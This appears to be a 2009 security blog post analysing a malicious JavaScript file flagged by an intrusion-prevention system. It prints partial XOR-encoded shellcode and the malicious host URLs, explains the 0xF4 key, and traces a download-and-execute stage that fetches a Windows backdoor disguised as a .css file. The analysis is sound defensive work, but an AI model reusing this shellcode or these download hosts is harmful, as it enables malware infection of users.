shellcode does what?!

I had an IPS event pop up that I got to review.

File is a static javascript variable ( bit of an oxymoron I know 😛 )  that had shellcode defined.

Ran the URL into my local jsunpack and had a look at what it was able to find.

matt@malicious:~/research/jsunpack-n$ ./jsunpack-n.py -a -V -u “bbs. xcdx169. net /images /img /k /lll.jpg”
URL fetch bbs. xcdx169. net /images /img /k /lll.jpg
saved 4420 bytes to ./files/fetch_9ea2e60fd34ad1b771a600faa7f0c5cc88d31f2a

Processing ./files/fetch_9ea2e60fd34ad1b771a600faa7f0c5cc88d31f2a
[nothing detected] bbs. xcdx169. net /images /img /k /lll.jpg
info: [decodingLevel=0] found JavaScript
info: saved original parsed JavaScript to ./files/veryverbose_9ea2e60fd34ad1b771a600faa7f0c5cc88d31f2a

[file] created ./files/fetch_9ea2e60fd34ad1b771a600faa7f0c5cc88d31f2a from bbs. xcdx169. net /images /img /k /lll.jpg
[file] created ./files/veryverbose_9ea2e60fd34ad1b771a600faa7f0c5cc88d31f2a from bbs. xcdx169. net /images /img /k /lll.jpg

matt@malicious:~/research/jsunpack-n$ cat ./files/fetch_9ea2e60fd34ad1b771a600faa7f0c5cc88d31f2a

var YT00=”\xu10EB\xu4B5B\xuC933\xuFBB1\xu04B5\xu3480\xuF40B\xuFAE2\xu05EB\xuEBE8\xuFFFF\xu1DFF\xuF0AE\xuF4F4\xu90AB\xuC455″;
var YT01=”\xuF4F4\xu7FF4\xuF8B4\xu847F\xu59E8\xu9C7F\xu7FFC\xu9E03\xuADFB\xu0E1C\xuF4F7\xu16F4\xu9E0D\xu9C98\xu809A\xu9890″;

…..   Cut for Blog ( download link above if you want to look at the full thing. )

var YT23=”\xuD0AA\xu29F7\xu7F92\xuBFF8\xuAA7F\xuF7E8\xu7F29\xu7FF0\xu31F7\xuAA5F\xu37AD\xu551C\xu0B0F\xu7A0B\xuFABA\xu5E18″;
var YT24=”\xuF908\xu7C88\xuB90E\xu512F\xuF4E3\xuE288\xu0E91\xuEBE4\xuFE8D\xu0F1C\xu0963\xuD1FB\xu0B44\xu1036\xuBE30\xuEF1B”;
var YT25=”\xuB232\xu8A8D\xu162C\xu3487\xu1663\xu291B\xu4968\xu6886\xuEE61\xu559A\xuC99E\xu162C\xu953E\xuA312\xu4154\xuC24F”;
var YT26=”\xuDBEE\xuE684\xu3FF6\xu6EE1\xu8ADF\xu11AF\xuDCE8\xuBE3B\xu0FFC\xu5141\xu9CEE\xu281F\xu9A3E”;
var YT27=”\xu9c9f\xu8080\xuce84\xudbdb\xu9696\xuda87\xu978c\xu8c90\xuc2c5\xudacd\xu919a\xudb80\xu999d\xu9395\xu8791\xu9ddb\xu9399\xu9cdb\xuda8c\xu8797\xuf487\xuf4″;


( I’ve edited the shellcode from % to \x so if you download the above file and see it is different don’t be thinking I’m making stuff up 😛 )

Since I’ve not seen what has delivered this to the user, I’m left with loading it somehow to review it.

I dump the shellcode into http://sandsprite.com/shellcode_2_exe.php which will give you a .exe file with the shellcode attached. So you can load it up in Ollydbg and have a quick look.

As you can see there is the original stub that loads WSAStartup to load any references to winsock calls.  In this I’ve also hilighted within the small piece of code attached from the shellcode that its another stub but for an XOR encryption. As you can see, the XOR key is right there, 0xF4. There are 2 ways to go from here. We could step through the code to let it decrypt itself or since we know the key for the XOR we can just copy&paste the rest of the shellcode into WinHex and just manually let it decode the whole block.

We click OK and the code should dump out like this.

And at the end of the block we can see another URL that will be downloaded by the shellcode and executed.

matt@malicious:~/research/jsunpack-n$ ./jsunpack-n.py -a -V -u “http://bbs. xcdx169. net /images /img /hx.css”
URL fetch bbs. xcdx169. net /images /img /hx.css
saved 25088 bytes to ./files/fetch_8c3187ccfb755b516513ae9f68579b7bc75b0cef

Processing ./files/fetch_8c3187ccfb755b516513ae9f68579b7bc75b0cef
[nothing detected] [MZ] bbs. xcdx169. net /images /img /hx.css
info: [0] executable file

[file] created ./files/fetch_8c3187ccfb755b516513ae9f68579b7bc75b0cef from bbs. xcdx169. net /images /img /hx.css

matt@malicious:~/research/jsunpack-n$ file ./files/fetch_8c3187ccfb755b516513ae9f68579b7bc75b0cef
./files/fetch_8c3187ccfb755b516513ae9f68579b7bc75b0cef: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
matt@malicious:~/research/jsunpack-n$ md5sum ./files/fetch_8c3187ccfb755b516513ae9f68579b7bc75b0cef
883e3c54c21fda4efae0fc85ff96724c  ./files/fetch_8c3187ccfb755b516513ae9f68579b7bc75b0cef

We have a .exe file loaded from the site which hosted it as a .css. This .exe has reasonable coverage from VirusTotal.



1 Response to “shellcode does what?!”

  1. 1 Http_Referer
    December 7, 2009 at 1:08 am

    More details about the backdoor is available in the Ginwui.A description.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

November 2009
    Dec »

%d bloggers like this: